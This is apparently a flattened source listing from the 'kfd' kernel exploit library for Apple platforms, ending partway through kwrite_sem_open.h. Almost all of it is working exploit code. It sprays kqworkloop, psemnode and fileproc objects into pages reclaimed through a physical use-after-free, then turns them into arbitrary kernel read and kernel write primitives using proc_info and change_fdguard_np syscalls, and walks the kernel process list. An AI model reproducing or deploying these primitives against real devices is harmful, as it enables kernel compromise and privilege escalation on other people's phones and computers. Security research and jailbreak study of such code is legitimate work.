VM_PAGE_UNPACK_PTR(p) (vm_page_unpack_ptr((u64)(p))) 144 | #define VM_OBJECT_UNPACK(p) ((u64)(VM_UNPACK_POINTER(p, VM_PAGE_PACKED_PTR))) 145 | #define VM_PAGE_OBJECT(p) (VM_OBJECT_UNPACK((p)->vmp_object)) 146 | 147 | static inline u32 VM_PAGE_GET_PHYS_PAGE(struct vm_page* p) 148 | { 149 | assert((p >= vm_page_array_beginning_addr) && (p < vm_page_array_ending_addr)); 150 | return (u32)((u64)(p - vm_page_array_beginning_addr) + vm_first_phys_ppnum); 151 | } 152 | 153 | void print_vm_page(struct kfd* kfd, struct vm_page* page, u64 page_kaddr) 154 | { 155 | assert(vm_pages); 156 | assert(vm_page_array_beginning_addr); 157 | assert(vm_page_array_ending_addr); 158 | assert(vm_first_phys_ppnum); 159 | 160 | print_message("struct vm_page @ %016llx", page_kaddr); 161 | struct vm_page* p = (struct vm_page*)(page_kaddr); 162 | print_x32(VM_PAGE_GET_PHYS_PAGE(p)); 163 | print_x64(VM_PAGE_OBJECT(page)); 164 | print_x64(page->vmp_offset); 165 | print_u32(page->vmp_q_state); 166 | print_u32(page->vmp_on_specialq); 167 | print_bool(page->vmp_gobbled); 168 | print_bool(page->vmp_laundry); 169 | print_bool(page->vmp_no_cache); 170 | print_bool(page->vmp_private); 171 | print_bool(page->vmp_reference); 172 | print_bool(page->vmp_lopage); 173 | print_bool(page->vmp_realtime); 174 | print_bool(page->vmp_busy); 175 | print_bool(page->vmp_wanted); 176 | print_bool(page->vmp_tabled); 177 | print_bool(page->vmp_hashed); 178 | print_bool(page->vmp_fictitious); 179 | print_bool(page->vmp_clustered); 180 | print_bool(page->vmp_pmapped); 181 | print_bool(page->vmp_xpmapped); 182 | print_bool(page->vmp_wpmapped); 183 | print_bool(page->vmp_free_when_done); 184 | print_bool(page->vmp_absent); 185 | print_bool(page->vmp_error); 186 | print_bool(page->vmp_dirty); 187 | print_bool(page->vmp_cleaning); 188 | print_bool(page->vmp_precious); 189 | print_bool(page->vmp_overwriting); 190 | print_bool(page->vmp_restart); 191 | print_bool(page->vmp_unusual); 192 | print_bool(page->vmp_reusable); 193 | print_bool(page->vmp_written_by_kernel); 194 | } 195 | 196 | #endif /* vm_page_h */ 197 | -------------------------------------------------------------------------------- /kfd/libkfd/krkw.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef krkw_h 6 | #define krkw_h 7 | 8 | #define kread_from_method(type, method) \ 9 | do { \ 10 | volatile type* type_base = (volatile type*)(uaddr); \ 11 | u64 type_size = ((size) / (sizeof(type))); \ 12 | for (u64 type_offset = 0; type_offset < type_size; type_offset++) { \ 13 | type type_value = method(kfd, kaddr + (type_offset * sizeof(type))); \ 14 | type_base[type_offset] = type_value; \ 15 | } \ 16 | } while (0) 17 | 18 | #include "krkw/kread/kread_kqueue_workloop_ctl.h" 19 | #include "krkw/kread/kread_sem_open.h" 20 | 21 | #define kwrite_from_method(type, method) \ 22 | do { \ 23 | volatile type* type_base = (volatile type*)(uaddr); \ 24 | u64 type_size = ((size) / (sizeof(type))); \ 25 | for (u64 type_offset = 0; type_offset < type_size; type_offset++) { \ 26 | type type_value = type_base[type_offset]; \ 27 | method(kfd, kaddr + (type_offset * sizeof(type)), type_value); \ 28 | } \ 29 | } while (0) 30 | 31 | #include "krkw/kwrite/kwrite_dup.h" 32 | #include "krkw/kwrite/kwrite_sem_open.h" 33 | 34 | // Forward declarations for helper functions. 35 | void krkw_helper_init(struct kfd* kfd, struct krkw* krkw); 36 | void krkw_helper_grab_free_pages(struct kfd* kfd); 37 | void krkw_helper_run_allocate(struct kfd* kfd, struct krkw* krkw); 38 | void krkw_helper_run_deallocate(struct kfd* kfd, struct krkw* krkw); 39 | void krkw_helper_free(struct kfd* kfd, struct krkw* krkw); 40 | 41 | #define kread_method_case(method) \ 42 | case method: { \ 43 | const char* method_name = #method; \ 44 | print_string(method_name); \ 45 | kfd->kread.krkw_method_ops.init = method##_init; \ 46 | kfd->kread.krkw_method_ops.allocate = method##_allocate; \ 47 | kfd->kread.krkw_method_ops.search = method##_search; \ 48 | kfd->kread.krkw_method_ops.kread = method##_kread; \ 49 | kfd->kread.krkw_method_ops.kwrite = NULL; \ 50 | kfd->kread.krkw_method_ops.find_proc = method##_find_proc; \ 51 | kfd->kread.krkw_method_ops.deallocate = method##_deallocate; \ 52 | kfd->kread.krkw_method_ops.free = method##_free; \ 53 | break; \ 54 | } 55 | 56 | #define kwrite_method_case(method) \ 57 | case method: { \ 58 | const char* method_name = #method; \ 59 | print_string(method_name); \ 60 | kfd->kwrite.krkw_method_ops.init = method##_init; \ 61 | kfd->kwrite.krkw_method_ops.allocate = method##_allocate; \ 62 | kfd->kwrite.krkw_method_ops.search = method##_search; \ 63 | kfd->kwrite.krkw_method_ops.kread = NULL; \ 64 | kfd->kwrite.krkw_method_ops.kwrite = method##_kwrite; \ 65 | kfd->kwrite.krkw_method_ops.find_proc = method##_find_proc; \ 66 | kfd->kwrite.krkw_method_ops.deallocate = method##_deallocate; \ 67 | kfd->kwrite.krkw_method_ops.free = method##_free; \ 68 | break; \ 69 | } 70 | 71 | void krkw_init(struct kfd* kfd, u64 kread_method, u64 kwrite_method) 72 | { 73 | switch (kread_method) { 74 | kread_method_case(kread_kqueue_workloop_ctl) 75 | kread_method_case(kread_sem_open) 76 | } 77 | 78 | switch (kwrite_method) { 79 | kwrite_method_case(kwrite_dup) 80 | kwrite_method_case(kwrite_sem_open) 81 | } 82 | 83 | krkw_helper_init(kfd, &kfd->kread); 84 | krkw_helper_init(kfd, &kfd->kwrite); 85 | } 86 | 87 | void krkw_run(struct kfd* kfd) 88 | { 89 | krkw_helper_grab_free_pages(kfd); 90 | 91 | timer_start(); 92 | krkw_helper_run_allocate(kfd, &kfd->kread); 93 | krkw_helper_run_allocate(kfd, &kfd->kwrite); 94 | krkw_helper_run_deallocate(kfd, &kfd->kread); 95 | krkw_helper_run_deallocate(kfd, &kfd->kwrite); 96 | timer_end(); 97 | } 98 | 99 | void krkw_kread(struct kfd* kfd, u64 kaddr, void* uaddr, u64 size) 100 | { 101 | kfd->kread.krkw_method_ops.kread(kfd, kaddr, uaddr, size); 102 | } 103 | 104 | void krkw_kwrite(struct kfd* kfd, void* uaddr, u64 kaddr, u64 size) 105 | { 106 | kfd->kwrite.krkw_method_ops.kwrite(kfd, uaddr, kaddr, size); 107 | } 108 | 109 | void krkw_free(struct kfd* kfd) 110 | { 111 | krkw_helper_free(kfd, &kfd->kread); 112 | krkw_helper_free(kfd, &kfd->kwrite); 113 | } 114 | 115 | /* 116 | * Helper krkw functions. 117 | */ 118 | 119 | void krkw_helper_init(struct kfd* kfd, struct krkw* krkw) 120 | { 121 | krkw->krkw_method_ops.init(kfd); 122 | } 123 | 124 | void krkw_helper_grab_free_pages(struct kfd* kfd) 125 | { 126 | timer_start(); 127 | 128 | const u64 copy_pages = (kfd->info.copy.size / pages(1)); 129 | const u64 grabbed_puaf_pages_goal = (kfd->puaf.number_of_puaf_pages / 4); 130 | const u64 grabbed_free_pages_max = 400000; 131 | 132 | for (u64 grabbed_free_pages = copy_pages; grabbed_free_pages < grabbed_free_pages_max; grabbed_free_pages += copy_pages) { 133 | assert_mach(vm_copy(mach_task_self(), kfd->info.copy.src_uaddr, kfd->info.copy.size, kfd->info.copy.dst_uaddr)); 134 | 135 | u64 grabbed_puaf_pages = 0; 136 | for (u64 i = 0; i < kfd->puaf.number_of_puaf_pages; i++) { 137 | u64 puaf_page_uaddr = kfd->puaf.puaf_pages_uaddr[i]; 138 | if (!memcmp(copy_sentinel, (void*)(puaf_page_uaddr), copy_sentinel_size)) { 139 | if (++grabbed_puaf_pages == grabbed_puaf_pages_goal) { 140 | print_u64(grabbed_free_pages); 141 | timer_end(); 142 | return; 143 | } 144 | } 145 | } 146 | } 147 | 148 | print_warning("failed to grab free pages goal"); 149 | } 150 | 151 | void krkw_helper_run_allocate(struct kfd* kfd, struct krkw* krkw) 152 | { 153 | timer_start(); 154 | const u64 batch_size = (pages(1) / krkw->krkw_object_size); 155 | 156 | while (true) { 157 | /* 158 | * Spray a batch of objects, but stop if the maximum id has been reached. 159 | */ 160 | bool maximum_reached = false; 161 | 162 | for (u64 i = 0; i < batch_size; i++) { 163 | if (krkw->krkw_allocated_id == krkw->krkw_maximum_id) { 164 | maximum_reached = true; 165 | break; 166 | } 167 | 168 | krkw->krkw_method_ops.allocate(kfd, krkw->krkw_allocated_id); 169 | krkw->krkw_allocated_id++; 170 | } 171 | 172 | /* 173 | * Search the puaf pages for the last batch of objects. 174 | * 175 | * Note that we make the following assumptions: 176 | * - All objects have a 64-bit alignment. 177 | * - All objects can be found within 1/16th of a page. 178 | * - All objects have a size smaller than 15/16th of a page. 179 | */ 180 | for (u64 i = 0; i < kfd->puaf.number_of_puaf_pages; i++) { 181 | u64 puaf_page_uaddr = kfd->puaf.puaf_pages_uaddr[i]; 182 | u64 stop_uaddr = puaf_page_uaddr + (pages(1) / 16); 183 | for (u64 object_uaddr = puaf_page_uaddr; object_uaddr < stop_uaddr; object_uaddr += sizeof(u64)) { 184 | if (krkw->krkw_method_ops.search(kfd, object_uaddr)) { 185 | krkw->krkw_searched_id = krkw->krkw_object_id; 186 | krkw->krkw_object_uaddr = object_uaddr; 187 | goto loop_break; 188 | } 189 | } 190 | } 191 | 192 | krkw->krkw_searched_id = krkw->krkw_allocated_id; 193 | 194 | if (maximum_reached) { 195 | loop_break: 196 | break; 197 | } 198 | } 199 | 200 | timer_end(); 201 | const char* krkw_type = (krkw->krkw_method_ops.kread) ? "kread" : "kwrite"; 202 | 203 | if (!krkw->krkw_object_uaddr) { 204 | for (u64 i = 0; i < kfd->puaf.number_of_puaf_pages; i++) { 205 | u64 puaf_page_uaddr = kfd->puaf.puaf_pages_uaddr[i]; 206 | print_buffer(puaf_page_uaddr, 64); 207 | } 208 | 209 | assert_false(krkw_type); 210 | } 211 | 212 | print_message( 213 | "%s ---> object_id = %llu, object_uaddr = 0x%016llx, object_size = %llu, allocated_id = %llu/%llu, batch_size = %llu", 214 | krkw_type, 215 | krkw->krkw_object_id, 216 | krkw->krkw_object_uaddr, 217 | krkw->krkw_object_size, 218 | krkw->krkw_allocated_id, 219 | krkw->krkw_maximum_id, 220 | batch_size 221 | ); 222 | 223 | print_buffer(krkw->krkw_object_uaddr, krkw->krkw_object_size); 224 | 225 | if (!kfd->info.kaddr.current_proc) { 226 | krkw->krkw_method_ops.find_proc(kfd); 227 | } 228 | } 229 | 230 | void krkw_helper_run_deallocate(struct kfd* kfd, struct krkw* krkw) 231 | { 232 | timer_start(); 233 | 234 | for (u64 id = 0; id < krkw->krkw_allocated_id; id++) { 235 | if (id == krkw->krkw_object_id) { 236 | continue; 237 | } 238 | 239 | krkw->krkw_method_ops.deallocate(kfd, id); 240 | } 241 | 242 | timer_end(); 243 | } 244 | 245 | void krkw_helper_free(struct kfd* kfd, struct krkw* krkw) 246 | { 247 | krkw->krkw_method_ops.free(kfd); 248 | 249 | if (krkw->krkw_method_data) { 250 | bzero_free(krkw->krkw_method_data, krkw->krkw_method_data_size); 251 | } 252 | } 253 | 254 | #endif /* krkw_h */ 255 | -------------------------------------------------------------------------------- /kfd/libkfd/krkw/kread/kread_kqueue_workloop_ctl.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef kread_kqueue_workloop_ctl_h 6 | #define kread_kqueue_workloop_ctl_h 7 | 8 | const u64 kread_kqueue_workloop_ctl_sentinel = 0x1122334455667788; 9 | 10 | u64 kread_kqueue_workloop_ctl_kread_u64(struct kfd* kfd, u64 kaddr); 11 | 12 | void kread_kqueue_workloop_ctl_init(struct kfd* kfd) 13 | { 14 | kfd->kread.krkw_maximum_id = 100000; 15 | kfd->kread.krkw_object_size = dynamic_sizeof(kqworkloop); 16 | } 17 | 18 | void kread_kqueue_workloop_ctl_allocate(struct kfd* kfd, u64 id) 19 | { 20 | struct kqueue_workloop_params params = { 21 | .kqwlp_version = (i32)(sizeof(params)), 22 | .kqwlp_flags = KQ_WORKLOOP_CREATE_SCHED_PRI, 23 | .kqwlp_id = id + kread_kqueue_workloop_ctl_sentinel, 24 | .kqwlp_sched_pri = 1, 25 | }; 26 | 27 | u64 cmd = KQ_WORKLOOP_CREATE; 28 | u64 options = 0; 29 | u64 addr = (u64)(¶ms); 30 | usize sz = (usize)(params.kqwlp_version); 31 | assert_bsd(syscall(SYS_kqueue_workloop_ctl, cmd, options, addr, sz)); 32 | } 33 | 34 | bool kread_kqueue_workloop_ctl_search(struct kfd* kfd, u64 object_uaddr) 35 | { 36 | u64 sentinel_min = kread_kqueue_workloop_ctl_sentinel; 37 | u64 sentinel_max = sentinel_min + kfd->kread.krkw_allocated_id; 38 | 39 | u16 kqwl_state = dynamic_uget(kqworkloop, kqwl_state, object_uaddr); 40 | u64 kqwl_dynamicid = dynamic_uget(kqworkloop, kqwl_dynamicid, object_uaddr); 41 | 42 | if ((kqwl_state == (KQ_KEV_QOS | KQ_WORKLOOP | KQ_DYNAMIC)) && 43 | (kqwl_dynamicid >= sentinel_min) && 44 | (kqwl_dynamicid < sentinel_max)) { 45 | u64 object_id = kqwl_dynamicid - sentinel_min; 46 | kfd->kread.krkw_object_id = object_id; 47 | return true; 48 | } 49 | 50 | return false; 51 | } 52 | 53 | void kread_kqueue_workloop_ctl_kread(struct kfd* kfd, u64 kaddr, void* uaddr, u64 size) 54 | { 55 | kread_from_method(u64, kread_kqueue_workloop_ctl_kread_u64); 56 | } 57 | 58 | void kread_kqueue_workloop_ctl_find_proc(struct kfd* kfd) 59 | { 60 | u64 kqworkloop_uaddr = kfd->kread.krkw_object_uaddr; 61 | kfd->info.kaddr.current_proc = dynamic_uget(kqworkloop, kqwl_p, kqworkloop_uaddr); 62 | } 63 | 64 | void kread_kqueue_workloop_ctl_deallocate(struct kfd* kfd, u64 id) 65 | { 66 | struct kqueue_workloop_params params = { 67 | .kqwlp_version = (i32)(sizeof(params)), 68 | .kqwlp_id = id + kread_kqueue_workloop_ctl_sentinel, 69 | }; 70 | 71 | u64 cmd = KQ_WORKLOOP_DESTROY; 72 | u64 options = 0; 73 | u64 addr = (u64)(¶ms); 74 | usize sz = (usize)(params.kqwlp_version); 75 | assert_bsd(syscall(SYS_kqueue_workloop_ctl, cmd, options, addr, sz)); 76 | } 77 | 78 | void kread_kqueue_workloop_ctl_free(struct kfd* kfd) 79 | { 80 | kread_kqueue_workloop_ctl_deallocate(kfd, kfd->kread.krkw_object_id); 81 | } 82 | 83 | /* 84 | * 64-bit kread function. 85 | */ 86 | 87 | u64 kread_kqueue_workloop_ctl_kread_u64(struct kfd* kfd, u64 kaddr) 88 | { 89 | u64 kqworkloop_uaddr = kfd->kread.krkw_object_uaddr; 90 | u64 old_kqwl_owner = dynamic_uget(kqworkloop, kqwl_owner, kqworkloop_uaddr); 91 | u64 new_kqwl_owner = kaddr - dynamic_offsetof(thread, thread_id); 92 | dynamic_uset(kqworkloop, kqwl_owner, kqworkloop_uaddr, new_kqwl_owner); 93 | 94 | struct kqueue_dyninfo data = {}; 95 | i32 callnum = PROC_INFO_CALL_PIDDYNKQUEUEINFO; 96 | i32 pid = kfd->info.env.pid; 97 | u32 flavor = PROC_PIDDYNKQUEUE_INFO; 98 | u64 arg = kfd->kread.krkw_object_id + kread_kqueue_workloop_ctl_sentinel; 99 | u64 buffer = (u64)(&data); 100 | i32 buffersize = (i32)(sizeof(struct kqueue_dyninfo)); 101 | assert(syscall(SYS_proc_info, callnum, pid, flavor, arg, buffer, buffersize) == buffersize); 102 | 103 | dynamic_uset(kqworkloop, kqwl_owner, kqworkloop_uaddr, old_kqwl_owner); 104 | return data.kqdi_owner; 105 | } 106 | 107 | #endif /* kread_kqueue_workloop_ctl_h */ 108 | -------------------------------------------------------------------------------- /kfd/libkfd/krkw/kread/kread_sem_open.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef kread_sem_open_h 6 | #define kread_sem_open_h 7 | 8 | const char* kread_sem_open_name = "kfd-posix-semaphore"; 9 | 10 | u64 kread_sem_open_kread_u64(struct kfd* kfd, u64 kaddr); 11 | u32 kread_sem_open_kread_u32(struct kfd* kfd, u64 kaddr); 12 | 13 | void kread_sem_open_init(struct kfd* kfd) 14 | { 15 | kfd->kread.krkw_maximum_id = kfd->info.env.maxfilesperproc - 100; 16 | kfd->kread.krkw_object_size = sizeof(struct psemnode); 17 | 18 | kfd->kread.krkw_method_data_size = ((kfd->kread.krkw_maximum_id + 1) * (sizeof(i32))) + sizeof(struct psem_fdinfo); 19 | kfd->kread.krkw_method_data = malloc_bzero(kfd->kread.krkw_method_data_size); 20 | 21 | sem_unlink(kread_sem_open_name); 22 | i32 sem_fd = (i32)(usize)(sem_open(kread_sem_open_name, (O_CREAT | O_EXCL), (S_IRUSR | S_IWUSR), 0)); 23 | assert(sem_fd > 0); 24 | 25 | i32* fds = (i32*)(kfd->kread.krkw_method_data); 26 | fds[kfd->kread.krkw_maximum_id] = sem_fd; 27 | 28 | struct psem_fdinfo* sem_data = (struct psem_fdinfo*)(&fds[kfd->kread.krkw_maximum_id + 1]); 29 | i32 callnum = PROC_INFO_CALL_PIDFDINFO; 30 | i32 pid = kfd->info.env.pid; 31 | u32 flavor = PROC_PIDFDPSEMINFO; 32 | u64 arg = sem_fd; 33 | u64 buffer = (u64)(sem_data); 34 | i32 buffersize = (i32)(sizeof(struct psem_fdinfo)); 35 | assert(syscall(SYS_proc_info, callnum, pid, flavor, arg, buffer, buffersize) == buffersize); 36 | } 37 | 38 | void kread_sem_open_allocate(struct kfd* kfd, u64 id) 39 | { 40 | i32 fd = (i32)(usize)(sem_open(kread_sem_open_name, 0, 0, 0)); 41 | assert(fd > 0); 42 | 43 | i32* fds = (i32*)(kfd->kread.krkw_method_data); 44 | fds[id] = fd; 45 | } 46 | 47 | bool kread_sem_open_search(struct kfd* kfd, u64 object_uaddr) 48 | { 49 | volatile struct psemnode* pnode = (volatile struct psemnode*)(object_uaddr); 50 | i32* fds = (i32*)(kfd->kread.krkw_method_data); 51 | struct psem_fdinfo* sem_data = (struct psem_fdinfo*)(&fds[kfd->kread.krkw_maximum_id + 1]); 52 | 53 | if ((pnode[0].pinfo > pac_mask) && 54 | (pnode[1].pinfo == pnode[0].pinfo) && 55 | (pnode[2].pinfo == pnode[0].pinfo) && 56 | (pnode[3].pinfo == pnode[0].pinfo) && 57 | (pnode[0].padding == 0) && 58 | (pnode[1].padding == 0) && 59 | (pnode[2].padding == 0) && 60 | (pnode[3].padding == 0)) { 61 | for (u64 object_id = kfd->kread.krkw_searched_id; object_id < kfd->kread.krkw_allocated_id; object_id++) { 62 | struct psem_fdinfo data = {}; 63 | i32 callnum = PROC_INFO_CALL_PIDFDINFO; 64 | i32 pid = kfd->info.env.pid; 65 | u32 flavor = PROC_PIDFDPSEMINFO; 66 | u64 arg = fds[object_id]; 67 | u64 buffer = (u64)(&data); 68 | i32 buffersize = (i32)(sizeof(struct psem_fdinfo)); 69 | 70 | const u64 shift_amount = 4; 71 | pnode[0].pinfo += shift_amount; 72 | assert(syscall(SYS_proc_info, callnum, pid, flavor, arg, buffer, buffersize) == buffersize); 73 | pnode[0].pinfo -= shift_amount; 74 | 75 | if (!memcmp(&data.pseminfo.psem_name[0], &sem_data->pseminfo.psem_name[shift_amount], 16)) { 76 | kfd->kread.krkw_object_id = object_id; 77 | return true; 78 | } 79 | } 80 | 81 | /* 82 | * False alarm: it wasn't one of our psemmode objects. 83 | */ 84 | print_warning("failed to find modified psem_name sentinel"); 85 | } 86 | 87 | return false; 88 | } 89 | 90 | void kread_sem_open_kread(struct kfd* kfd, u64 kaddr, void* uaddr, u64 size) 91 | { 92 | kread_from_method(u64, kread_sem_open_kread_u64); 93 | } 94 | 95 | void kread_sem_open_find_proc(struct kfd* kfd) 96 | { 97 | u64 pseminfo_kaddr = static_uget(psemnode, pinfo, kfd->kread.krkw_object_uaddr); 98 | u64 semaphore_kaddr = static_kget(pseminfo, u64, psem_semobject, pseminfo_kaddr); 99 | u64 task_kaddr = static_kget(semaphore, u64, owner, semaphore_kaddr); 100 | u64 proc_kaddr = task_kaddr - dynamic_sizeof(proc); 101 | kfd->info.kaddr.kernel_proc = proc_kaddr; 102 | 103 | /* 104 | * Go backwards from the kernel_proc, which is the last proc in the list. 105 | */ 106 | while (true) { 107 | i32 pid = dynamic_kget(proc, p_pid, proc_kaddr); 108 | if (pid == kfd->info.env.pid) { 109 | kfd->info.kaddr.current_proc = proc_kaddr; 110 | break; 111 | } 112 | 113 | proc_kaddr = dynamic_kget(proc, p_list_le_prev, proc_kaddr); 114 | } 115 | } 116 | 117 | void kread_sem_open_deallocate(struct kfd* kfd, u64 id) 118 | { 119 | /* 120 | * Let kwrite_sem_open_deallocate() take care of 121 | * deallocating all the shared file descriptors. 122 | */ 123 | return; 124 | } 125 | 126 | void kread_sem_open_free(struct kfd* kfd) 127 | { 128 | /* 129 | * Let's null out the kread reference to the shared data buffer 130 | * because kwrite_sem_open_free() needs it and will free it. 131 | */ 132 | kfd->kread.krkw_method_data = NULL; 133 | } 134 | 135 | /* 136 | * 64-bit kread function. 137 | */ 138 | 139 | u64 kread_sem_open_kread_u64(struct kfd* kfd, u64 kaddr) 140 | { 141 | i32* fds = (i32*)(kfd->kread.krkw_method_data); 142 | i32 kread_fd = fds[kfd->kread.krkw_object_id]; 143 | u64 psemnode_uaddr = kfd->kread.krkw_object_uaddr; 144 | 145 | u64 old_pinfo = static_uget(psemnode, pinfo, psemnode_uaddr); 146 | u64 new_pinfo = kaddr - static_offsetof(pseminfo, psem_uid); 147 | static_uset(psemnode, pinfo, psemnode_uaddr, new_pinfo); 148 | 149 | struct psem_fdinfo data = {}; 150 | i32 callnum = PROC_INFO_CALL_PIDFDINFO; 151 | i32 pid = kfd->info.env.pid; 152 | u32 flavor = PROC_PIDFDPSEMINFO; 153 | u64 arg = kread_fd; 154 | u64 buffer = (u64)(&data); 155 | i32 buffersize = (i32)(sizeof(struct psem_fdinfo)); 156 | assert(syscall(SYS_proc_info, callnum, pid, flavor, arg, buffer, buffersize) == buffersize); 157 | 158 | static_uset(psemnode, pinfo, psemnode_uaddr, old_pinfo); 159 | return *(u64*)(&data.pseminfo.psem_stat.vst_uid); 160 | } 161 | 162 | /* 163 | * 32-bit kread function that is guaranteed to not underflow a page, 164 | * i.e. those 4 bytes are the first 4 bytes read by the modified kernel pointer. 165 | */ 166 | 167 | u32 kread_sem_open_kread_u32(struct kfd* kfd, u64 kaddr) 168 | { 169 | i32* fds = (i32*)(kfd->kread.krkw_method_data); 170 | i32 kread_fd = fds[kfd->kread.krkw_object_id]; 171 | u64 psemnode_uaddr = kfd->kread.krkw_object_uaddr; 172 | 173 | u64 old_pinfo = static_uget(psemnode, pinfo, psemnode_uaddr); 174 | u64 new_pinfo = kaddr - static_offsetof(pseminfo, psem_usecount); 175 | static_uset(psemnode, pinfo, psemnode_uaddr, new_pinfo); 176 | 177 | struct psem_fdinfo data = {}; 178 | i32 callnum = PROC_INFO_CALL_PIDFDINFO; 179 | i32 pid = kfd->info.env.pid; 180 | u32 flavor = PROC_PIDFDPSEMINFO; 181 | u64 arg = kread_fd; 182 | u64 buffer = (u64)(&data); 183 | i32 buffersize = (i32)(sizeof(struct psem_fdinfo)); 184 | assert(syscall(SYS_proc_info, callnum, pid, flavor, arg, buffer, buffersize) == buffersize); 185 | 186 | static_uset(psemnode, pinfo, psemnode_uaddr, old_pinfo); 187 | return *(u32*)(&data.pseminfo.psem_stat.vst_size); 188 | } 189 | 190 | #endif /* kread_sem_open_h */ 191 | -------------------------------------------------------------------------------- /kfd/libkfd/krkw/kwrite/kwrite_dup.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef kwrite_dup_h 6 | #define kwrite_dup_h 7 | 8 | void kwrite_dup_kwrite_u64(struct kfd* kfd, u64 kaddr, u64 new_value); 9 | 10 | void kwrite_dup_init(struct kfd* kfd) 11 | { 12 | kfd->kwrite.krkw_maximum_id = kfd->info.env.maxfilesperproc - 100; 13 | kfd->kwrite.krkw_object_size = sizeof(struct fileproc); 14 | 15 | kfd->kwrite.krkw_method_data_size = ((kfd->kwrite.krkw_maximum_id + 1) * (sizeof(i32))); 16 | kfd->kwrite.krkw_method_data = malloc_bzero(kfd->kwrite.krkw_method_data_size); 17 | 18 | i32 kqueue_fd = kqueue(); 19 | assert(kqueue_fd > 0); 20 | 21 | i32* fds = (i32*)(kfd->kwrite.krkw_method_data); 22 | fds[kfd->kwrite.krkw_maximum_id] = kqueue_fd; 23 | } 24 | 25 | void kwrite_dup_allocate(struct kfd* kfd, u64 id) 26 | { 27 | i32* fds = (i32*)(kfd->kwrite.krkw_method_data); 28 | i32 kqueue_fd = fds[kfd->kwrite.krkw_maximum_id]; 29 | i32 fd = dup(kqueue_fd); 30 | assert(fd > 0); 31 | fds[id] = fd; 32 | } 33 | 34 | bool kwrite_dup_search(struct kfd* kfd, u64 object_uaddr) 35 | { 36 | i32* fds = (i32*)(kfd->kwrite.krkw_method_data); 37 | 38 | if ((static_uget(fileproc, fp_iocount, object_uaddr) == 1) && 39 | (static_uget(fileproc, fp_vflags, object_uaddr) == 0) && 40 | (static_uget(fileproc, fp_flags, object_uaddr) == 0) && 41 | (static_uget(fileproc, fp_guard_attrs, object_uaddr) == 0) && 42 | (static_uget(fileproc, fp_glob, object_uaddr) > ptr_mask) && 43 | (static_uget(fileproc, fp_guard, object_uaddr) == 0)) { 44 | for (u64 object_id = kfd->kwrite.krkw_searched_id; object_id < kfd->kwrite.krkw_allocated_id; object_id++) { 45 | assert_bsd(fcntl(fds[object_id], F_SETFD, FD_CLOEXEC)); 46 | 47 | if (static_uget(fileproc, fp_flags, object_uaddr) == 1) { 48 | kfd->kwrite.krkw_object_id = object_id; 49 | return true; 50 | } 51 | 52 | assert_bsd(fcntl(fds[object_id], F_SETFD, 0)); 53 | } 54 | 55 | /* 56 | * False alarm: it wasn't one of our fileproc objects. 57 | */ 58 | print_warning("failed to find modified fp_flags sentinel"); 59 | } 60 | 61 | return false; 62 | } 63 | 64 | void kwrite_dup_kwrite(struct kfd* kfd, void* uaddr, u64 kaddr, u64 size) 65 | { 66 | kwrite_from_method(u64, kwrite_dup_kwrite_u64); 67 | } 68 | 69 | void kwrite_dup_find_proc(struct kfd* kfd) 70 | { 71 | /* 72 | * Assume that kread is responsible for that. 73 | */ 74 | return; 75 | } 76 | 77 | void kwrite_dup_deallocate(struct kfd* kfd, u64 id) 78 | { 79 | i32* fds = (i32*)(kfd->kwrite.krkw_method_data); 80 | assert_bsd(close(fds[id])); 81 | } 82 | 83 | void kwrite_dup_free(struct kfd* kfd) 84 | { 85 | kwrite_dup_deallocate(kfd, kfd->kwrite.krkw_object_id); 86 | kwrite_dup_deallocate(kfd, kfd->kwrite.krkw_maximum_id); 87 | } 88 | 89 | /* 90 | * 64-bit kwrite function. 91 | */ 92 | 93 | void kwrite_dup_kwrite_u64(struct kfd* kfd, u64 kaddr, u64 new_value) 94 | { 95 | if (new_value == 0) { 96 | print_warning("cannot write 0"); 97 | return; 98 | } 99 | 100 | i32* fds = (i32*)(kfd->kwrite.krkw_method_data); 101 | i32 kwrite_fd = fds[kfd->kwrite.krkw_object_id]; 102 | u64 fileproc_uaddr = kfd->kwrite.krkw_object_uaddr; 103 | 104 | const bool allow_retry = false; 105 | 106 | do { 107 | u64 old_value = 0; 108 | kread((u64)(kfd), kaddr, &old_value, sizeof(old_value)); 109 | 110 | if (old_value == 0) { 111 | print_warning("cannot overwrite 0"); 112 | return; 113 | } 114 | 115 | if (old_value == new_value) { 116 | break; 117 | } 118 | 119 | u16 old_fp_guard_attrs = static_uget(fileproc, fp_guard_attrs, fileproc_uaddr); 120 | u16 new_fp_guard_attrs = GUARD_REQUIRED; 121 | static_uset(fileproc, fp_guard_attrs, fileproc_uaddr, new_fp_guard_attrs); 122 | 123 | u64 old_fp_guard = static_uget(fileproc, fp_guard, fileproc_uaddr); 124 | u64 new_fp_guard = kaddr - static_offsetof(fileproc_guard, fpg_guard); 125 | static_uset(fileproc, fp_guard, fileproc_uaddr, new_fp_guard); 126 | 127 | u64 guard = old_value; 128 | u32 guardflags = GUARD_REQUIRED; 129 | u64 nguard = new_value; 130 | u32 nguardflags = GUARD_REQUIRED; 131 | 132 | if (allow_retry) { 133 | syscall(SYS_change_fdguard_np, kwrite_fd, &guard, guardflags, &nguard, nguardflags, NULL); 134 | } else { 135 | assert_bsd(syscall(SYS_change_fdguard_np, kwrite_fd, &guard, guardflags, &nguard, nguardflags, NULL)); 136 | } 137 | 138 | static_uset(fileproc, fp_guard_attrs, fileproc_uaddr, old_fp_guard_attrs); 139 | static_uset(fileproc, fp_guard, fileproc_uaddr, old_fp_guard); 140 | } while (allow_retry); 141 | } 142 | 143 | #endif /* kwrite_dup_h */ 144 | -------------------------------------------------------------------------------- /kfd/libkfd/krkw/kwrite/kwrite_sem_open.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef kwrite_sem_open_h 6 | #define kwrite_sem_open_h 7 | 8 | void kwrite_sem_open_init(struct kfd* kfd) 9 | { 10 | kfd->kwrite.krkw_maximum_id = kfd->kread.krkw_maximum_id; 11 | 